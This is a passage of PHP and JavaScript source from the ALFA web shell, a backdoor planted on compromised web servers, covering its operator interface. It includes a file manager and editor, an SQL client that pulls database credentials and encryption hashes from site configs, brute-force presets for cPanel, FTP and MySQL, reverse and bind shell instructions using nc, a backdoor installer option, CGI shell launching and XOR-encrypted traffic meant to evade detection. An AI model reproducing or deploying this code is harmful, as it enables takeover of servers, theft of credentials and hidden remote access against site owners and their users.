4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #0E304A;background:#000;text-decoration:none;box-shadow:0 0 4px #0E304A;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
1386.foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'
1387.main th{text-align:left;}
1388.main a{color: #FFF;}
1389.main tr:hover{background-color:#646464;}
1390.ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }
1391.bigarea{ width:99%; height:300px; }
1392'.alfaCssLoadColors().'
1393</style>';
1394echo "<script type='text/javascript'>
1395var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
1396var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
1397var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
1398var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';
1399var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';
1400var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';
1401var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';
1402var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';
1403var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';
1404var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';
1405var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';
1406var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';
1407var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';
1408var d = document;
1409var mysql_cache = {};
1410var editor_files = {};
1411var editor_error = true;
1412var editor_current_file = '';
1413var is_minimized = false;
1414var cgi_is_minimized = false;
1415var cgi_lang = '';
1416var upcount = 1;
1417var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
1418var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";
1419function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
1420if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
1421if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;";
1422for($j=1;$j<=10;$j++){
1423echo 'if(alfa'.$j.'!=null)d.mf.alfa'.$j.'.value=alfa'.$j.';else d.mf.alfa'.$j.'.value=alfa'.$j.'_;';
1424}
1425echo "
1426if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
1427}";
1428echo 'function fc(a){alfaloader("block");var b="a="+alfab64("FilesMan")+"&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax="+alfab64("true")+"&",c="";for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");_Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";islinux&&(b="<a class=\"header_pwd\" onclick=\"g(\'FilesMan\',\'/\');\" href=\'javascript:void(0);\'>/</a>",c="/");var e=a.split("/"),f="",g="";"-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));for(i in e)""!=e[i]&&(f+="<a onclick=\"g(\'FilesMan\',\'"+g+e[i]+"/\');\" href=\'javascript:void(0);\' class=\"header_pwd\">"+e[i]+"/</a>",g+=e[i]+"/");$("header_cwd").innerHTML=b+f+" ";var e=c+e.join("/");e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a="+alfab64("FilesMan")+"&c="+a.c.value+"&ajax="+alfab64("true")),c.style.display="none",a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";upcount;){var f=$("pfooterup_"+upcount);f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none"),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="'.__showicon('loader').'"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfaloader(a){$("a_loader").style.display=a}function fsu(a){alfaloader("block");for(var b={},c=0;c<a.elements.length;c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");var obj={},id=$("dumpfile");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");"bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong> Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";}else{$("backdoor_textarea").style.display="none";}}
1429function saveByKey(event){
1430 if(!(String.fromCharCode(event.which).toLowerCase() == \'s\' && event.ctrlKey) && !(event.which == 19))return true;
1431 $("editor_edit_area").onsubmit();
1432 event.preventDefault();
1433 return false;
1434}
1435function setCookie(cname, cvalue, exdays){
1436 var d = new Date();
1437 d.setTime(d.getTime() + (exdays*24*60*60*1000));
1438 var expires = "expires="+ d.toUTCString();
1439 document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
1440}
1441function getCookie(name){
1442 var value = "; " + document.cookie;
1443 var parts = value.split("; " + name + "=");
1444 if (parts.length == 2) return parts.pop().split(";").shift();
1445}
1446function editorClose(pos){
1447 d.body.style.overflow = "visible";
1448 elem = $(pos);
1449 elem.setAttribute("class", "editor-anim-close");
1450 if(pos == "editor"){
1451 is_minimized = false;
1452 }else{
1453 cgi_is_minimized = false;
1454 }
1455 setTimeout(function(){
1456 elem.removeAttribute("class");
1457 elem.style.display = "none";
1458 }, 1000);
1459 d.body.style.overflow = "visible";
1460}
1461function showEditor(pos){
1462 $(pos).setAttribute("class", "editor-anim-show");
1463 $(pos+"-minimized").setAttribute("class", "minimized-hide");
1464 if(pos == "editor"){
1465 is_minimized = false;
1466 if(cgi_is_minimized){
1467 $("cgiloader-minimized").style.top = "30%";
1468 }
1469 }else{
1470 cgi_is_minimized = false;
1471 if(is_minimized){
1472 $("editor-minimized").style.top = "30%";
1473 }
1474 }
1475 d.body.style.overflow = "hidden";
1476}
1477function editorMinimize(pos){
1478 $(pos).setAttribute("class", "editor-anim-minimize");
1479 $(pos+"-minimized").setAttribute("class", "minimized-show");
1480 if(pos == "editor"){
1481 is_minimized = true;
1482 if(cgi_is_minimized){
1483 $("cgiloader-minimized").style.top = "20%";
1484 $("editor-minimized").style.top = "50%";
1485 }else{
1486 $("editor-minimized").style.top = "30%";
1487 }
1488 }else{
1489 cgi_is_minimized = true;
1490 if(is_minimized){
1491 $("cgiloader-minimized").style.top = "20%";
1492 $("editor-minimized").style.top = "50%";
1493 }else{
1494 $("cgiloader-minimized").style.top = "30%";
1495 }
1496 }
1497 d.body.style.overflow = "visible";
1498}
1499function clearEditorHistory(){
1500 var check = confirm("Are u Sure?");
1501 if(check){
1502 for(var i in editor_files){
1503 if(i != editor_current_file){
1504 removeHistory(i);
1505 }
1506 }
1507 }
1508}
1509function editor(file, mode, arg, pwd, file_id, type){
1510 if(type=="dir"&&file=="..")return false;
1511 if(mode == "download"){
1512 g("FilesTools",pwd,file,"download");
1513 return false;
1514 }
1515 var param = "", fid = "", pure_fid = "", cwd = d.mf.c.value, can_append = true;
1516 file = file.trim();
1517 if(Object.keys(editor_files).length == 0){
1518 var cookie_file = getCookie("alfa_history_files");
1519 try{
1520 editor_files = JSON.parse(cookie_file);
1521 for(var t in editor_files){
1522 insertToHistory(t, editor_files[t].file, 0, editor_files[t].type);
1523 }
1524 }catch(e){}
1525 }
1526 if(file.indexOf("/") != -1){
1527 var file_split = file.split("/");
1528 file = file_split[file_split.length - 1];
1529 delete file_split[file_split.length - 1];
1530 cwd = file_split.join("/");
1531 if(islinux){
1532 cwd = "/"+cwd;
1533 }
1534 }
1535 if(typeof type == "undefined"){
1536 type = "";
1537 }
1538 if(typeof pwd != "undefined" && pwd != null && pwd.length != 0){
1539 cwd = pwd.trim();
1540 }
1541 try{
1542 for(var i in editor_files){
1543 if(editor_files[i].file == decodeURIComponent(file) && editor_files[i].pwd.replace(/\//g,"") == cwd.replace(/\//g,"")){
1544 can_append = false;
1545 file_id = i;
1546 break;
1547 }
1548 }
1549 }catch(e){
1550 console.log(e);
1551 }
1552 editor_error = true;
1553 if(typeof arg != "undefined" && arg.length != 0 && arg != null){
1554 param = alfab64(arg);
1555 }
1556 if(typeof file_id != "undefined" && file_id != null && file_id.length != 0){
1557 fid = alfab64(file_id);
1558 pure_fid = file_id;
1559 }else{
1560 var rand_fid = "file_" + getRandom(10);
1561 fid = alfab64(rand_fid);
1562 pure_fid = rand_fid;
1563 }
1564 alfaloader("block");
1565 _Ajax(d.URL, "a="+alfab64("FilesTools")+"&c="+alfab64(cwd)+"&alfa1="+alfab64(file)+"&alfa2="+alfab64(mode)+"&alfa3="+param+"&alfa4="+fid+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"), function(e){
1566 document.querySelector(".editor-content").innerHTML = e;
1567 $("editor").style.display = "block";
1568 alfaloader("none");
1569 evalJS(e);
1570 if(mode != "delete" && editor_error){
1571 var active = d.getElementsByClassName("is_active");
1572 if(active.length != 0){
1573 active[0].className = "file-holder";
1574 }
1575 fid = pure_fid;
1576 file = decodeURIComponent(file);
1577
1578 if(!editor_files[fid] && can_append){
1579 editor_files[fid] = {"file": file, "pwd": cwd, "type": type};
1580 insertToHistory(fid, file, " is_active", type);
1581 if(mode=="mkfile"){
1582 g("FilesMan",null);
1583 }
1584 }else{
1585 $(fid).parentNode.className += " is_active";
1586 }
1587 }
1588 d.body.style.overflow = "hidden";
1589 d.getElementsByClassName("filestools")[0].setAttribute("fid", fid);
1590 if(editor_files[fid]){
1591 d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
1592 }
1593 editor_current_file = fid;
1594 if(is_minimized){
1595 showEditor("editor");
1596 }
1597 updateCookieEditor();
1598 });
1599 return false;
1600}
1601function insertToHistory(fid, file, mode, type){
1602 var active = "";
1603 if(mode && mode != 0){
1604 active = mode;
1605 }
1606 var NewElement = document.createElement("div");
1607 NewElement.innerHTML = "<div id=\'"+fid+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(file,type,fid)+"</div><div class=\'editor-file-name\'>"+file+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\""+fid+"\");\'>X</div>";
1608 NewElement.className = "file-holder" + active;
1609 NewElement.addEventListener("mouseover", function(){setEditorTitle(fid,"over");this.childNodes[1].style.opacity = "1";});
1610 NewElement.addEventListener("mouseout", function(){setEditorTitle(fid,"out");this.childNodes[1].style.opacity = "0";});
1611 var refNode = d.getElementsByClassName("history-list")[0];
1612 refNode.insertBefore(NewElement, refNode.firstChild);
1613}
1614function loadType(file,type,id){
1615 if(type == "none"){
1616 _Ajax(d.URL, "a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[id].pwd)+"&arg="+alfab64(editor_files[id].file), function(e){
1617 $(id).innerHTML = "<div class=\'editor-icon\'>"+loadType(editor_files[id].file,e,id)+"</div><div class=\'editor-file-name\'>"+editor_files[id].file+"</div>";
1618 editor_files[id].type = e;
1619 });
1620 }
1621 var img = \'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\';
1622 if(type == "file"){
1623 type = file.split(".");
1624 type = type[type.length - 1].toLowerCase();
1625 var types = ["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"];
1626 if(types.indexOf(type) == -1){
1627 type = "notfound";
1628 }
1629 }else{
1630 type = "folder";
1631 }
1632 return img.replace("{type}", type + ".png");
1633}
1634function updateDirsEditor(fid, fname){
1635 var current_path = d.mf.c.value + "/";
1636 var oldpath = editor_files[fid].pwd + "/" + fname + "/";
1637 var newpath = editor_files[fid].pwd + "/" + editor_files[fid].file + "/";
1638 oldpath = oldpath.replace(/\/\//g, "/");
1639 newpath = newpath.replace(/\/\//g, "/");
1640 current_path = current_path.replace(/\/\//g, "/");
1641 if(current_path.search(oldpath) != -1){
1642 initDir(current_path.replace(oldpath, newpath));
1643 d.mf.c.value = current_path.replace(oldpath, newpath);
1644 _Ajax(d.URL,"a="+alfab64("updatepath")+"&path="+alfab64(d.mf.c.value),function(e){console.log(e)});
1645 }
1646 for(var i in editor_files){
1647 var path = editor_files[i].pwd + "/";
1648 path = path.replace(/\/\//g, "/");
1649 if(path.search(oldpath) != -1){
1650 editor_files[i].pwd = path.replace(oldpath, newpath);
1651 }
1652 }
1653 var reg1 = new RegExp("\'"+oldpath.slice(0, -1)+"\'");
1654 var reg2 = new RegExp(fname + " \\\|</b></a>");
1655 d.files.innerHTML = d.files.innerHTML.replace(reg1, "\'"+newpath.slice(0, -1)+"\'");
1656 d.files.innerHTML = d.files.innerHTML.replace(reg2, editor_files[fid].file+" |</b></a>");
1657 updateCookieEditor();
1658}
1659function updateCookieEditor(){
1660 setCookie("alfa_history_files", JSON.stringify(editor_files), 2012);
1661}
1662function setEditorTitle(fid, mode){
1663 if(mode == "out" && editor_current_file != ""){
1664 fid = editor_current_file;
1665 }
1666 if(editor_files[fid]){
1667 d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
1668 }
1669}
1670function removeHistory(el){
1671 delete editor_files[el];
1672 if($(el)){
1673 $(el).parentNode.parentNode.removeChild($(el).parentNode);
1674 }
1675 var elm = d.getElementsByClassName("filestools")[0];
1676 if(elm){
1677 if(elm.getAttribute("fid") == el){
1678 elm.outerHTML = "";
1679 }
1680 }
1681 if(editor_current_file == el){
1682 editor_current_file = "";
1683 }
1684 updateCookieEditor();
1685}
1686function getRandom(e){
1687 for(var i = "undefined" == typeof e ? 20 : e, t = "", s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", n = i; n > 0; --n) t += s[Math.floor(Math.random() * s.length)];
1688 return t
1689}
1690function reopen(el){
1691 var file_id = el.getAttribute("id")
1692 var pwd = editor_files[file_id].pwd;
1693 var filename = editor_files[file_id].file;
1694 editor(filename, "auto", "", pwd, file_id);
1695}
1696function copyToClipboard(el){
1697 var node = document.getElementById(el);
1698 if(document.selection){
1699 var range = document.body.createTextRange();
1700 range.moveToElementText(document.getElementById(el));
1701 range.select();
1702 document.execCommand("Copy");
1703 alert("text copied");
1704 }else if (window.getSelection()){
1705 var range = document.createRange();
1706 range.selectNode(document.getElementById(el));
1707 window.getSelection().removeAllRanges();
1708 window.getSelection().addRange(range);
1709 document.execCommand("copy");
1710 alert("text copied");
1711 }
1712}
1713function encrypt(str, pwd) {
1714 if (pwd == null || pwd.length <= 0) {
1715 return null;
1716 }
1717 str = alfab64(str, true);
1718 pwd = alfab64(pwd, true);
1719 var enc_chr = "";
1720 var enc_str = "";
1721 var i = 0;
1722 while (i < str.length) {
1723 for (var j = 0; j < pwd.length; j++) {
1724 enc_chr = str.charCodeAt(i) ^ pwd.charCodeAt(j);
1725 enc_str += String.fromCharCode(enc_chr);
1726 i++;
1727 if (i >= str.length) break;
1728 }
1729 }
1730 return alfab64(enc_str, true);
1731}
1732function reloadSetting(e){
1733alfaloader("block");
1734_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},true);
1735if(e.e.value==0&&e.protect.value==1)setTimeout("location.reload()",1000);
1736if(e.s.value!=e.icon.value)setTimeout("location.reload()",1000);
1737return false
1738}
1739function reloadColors(config){
1740 var obj = {};
1741 if(typeof config == "undefined"){
1742 d.querySelectorAll(".colors_input").forEach(function(e){
1743 var id = e.getAttribute("target").replace(".", "");
1744 obj[id] = e.value;
1745 });
1746 }else{
1747 obj = config;
1748 }
1749 alfaloader("block");
1750 var checdk = ($("use_default_color").checked?"1":"0");
1751 _Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(obj))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(checdk)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){alfaloader("none");evalJS(e);},true);
1752}
1753function alfab64(a, normal){
1754 if(typeof normal != "undefined" || post_encryption_mode == false){
1755 return window.btoa(unescape(encodeURIComponent(a)));
1756 }
1757 return encrypt(a, "'._AlfaSecretKey().'");
1758}
1759function evalCss(jcss){
1760 var style = document.createElement("style");
1761 if (style.styleSheet) {
1762 style.styleSheet.cssText = jcss;
1763 } else {
1764 style.appendChild(document.createTextNode(jcss));
1765 }
1766 d.getElementsByTagName("head")[0].appendChild(style);
1767}
1768function colorHandlerKey(el){
1769 setTimeout(function(e){
1770 colorHandler(el);
1771 }, 200);
1772}
1773function colorHandler(el){
1774 var target = el.getAttribute("target");
1775 var multi = el.getAttribute("multi");
1776 var ishover = target.indexOf(":hover");
1777 if(multi){
1778 var array = JSON.parse(atob(multi));
1779 var jcss = "";
1780 for(i in array.multi_selector){
1781 jcss += i + "{"+array.multi_selector[i].replace(/{color}/g, el.value)+"}";
1782 }
1783 evalCss(jcss);
1784 }
1785 if(ishover != -1 && !multi){
1786 $("input_" + target.replace(".","")).value = el.value;
1787 $("gui_" + target.replace(".","")).value = el.value;
1788 var css = target+"{color: "+el.value+";}";
1789 evalCss(css);
1790 }else{
1791 $("input_" + target.replace(".","")).value = el.value;
1792 $("gui_" + target.replace(".","")).value = el.value;
1793 if(target == ".header_values"){
1794 target = ".header,.header_values";
1795 }
1796 d.querySelectorAll(target).forEach(function(e){
1797 e.style.color = el.value;
1798 });
1799 }
1800}
1801function importConfig(event){
1802 var input = event.target;
1803 var reader = new FileReader();
1804 reader.onload = function(){
1805 var data = reader.result;
1806 try{
1807 var conf = JSON.parse(data);
1808 reloadColors(conf);
1809 }catch(e){
1810 alert("Config is invalid...!");
1811 }
1812 $("importFileBtn").value = "";
1813 };
1814 reader.readAsText(input.files[0]);
1815}
1816function checkBox(){for(i=0;i<d.files.elements.length;i++){if(d.files.elements[i].type == "checkbox"){d.files.elements[i].checked = d.files.elements[0].checked;}}}
1817function path_history(pos){
1818 _Ajax(d.URL,"a="+alfab64("GetPathHistory")+"&ajax="+alfab64("true"),function(e){g("FilesMan", e);},true);
1819}
1820function runcgi(lang){
1821 if(cgi_is_minimized && cgi_lang == lang){
1822 showEditor("cgiloader");
1823 return false;
1824 }
1825 _Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(lang)+"&ajax="+alfab64("true"),function(e){
1826 d.body.style.overflow = "hidden";
1827 $("cgiloader").style.display = "block";
1828 $("cgiframe").innerHTML = e;
1829 cgi_lang = lang;
1830 if(cgi_is_minimized){
1831 $("cgiloader-minimized").setAttribute("class", "minimized-hide");
1832 setTimeout(function(){
1833 $("cgiloader").removeAttribute("class");
1834 if(is_minimized){
1835 $("editor-minimized").style.top = "30%";
1836 }
1837 }, 1000);
1838 }
1839 });
1840}
1841';
1842echo "</script>
1843<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
1844<input type='hidden' name='a' value='dlfile'>
1845<input type='hidden' name='c' value=''>
1846<input type='hidden' name='file' value=''>
1847</form>
1848<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
1849<img id='a_loader' src='".__showicon('loader')."'>";
1850$cmd_uname = alfaEx("uname -a",false,false);
1851$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
1852if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
1853echo '
1854</head>
1855<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
1856<div id="up_bar"></div>
1857<div class="whole">
1858<form method="post" name="mf" style="display:none;">
1859<input type="hidden" name="a">
1860<input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
1861for($s=1;$s<=10;$s++){
1862echo '<input type="hidden" name="alfa'.$s.'">';
1863}
1864echo '<input type="hidden" name="charset">
1865</form>
1866<div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell<br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
1867<div class="header"><table width="100%" border="0">
1868<tr>
1869<td width="3%"><span class="header_vars">Uname:</span></td>
1870<td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
1871</tr>
1872<tr>
1873<td><span class="header_vars">User:</span></td>
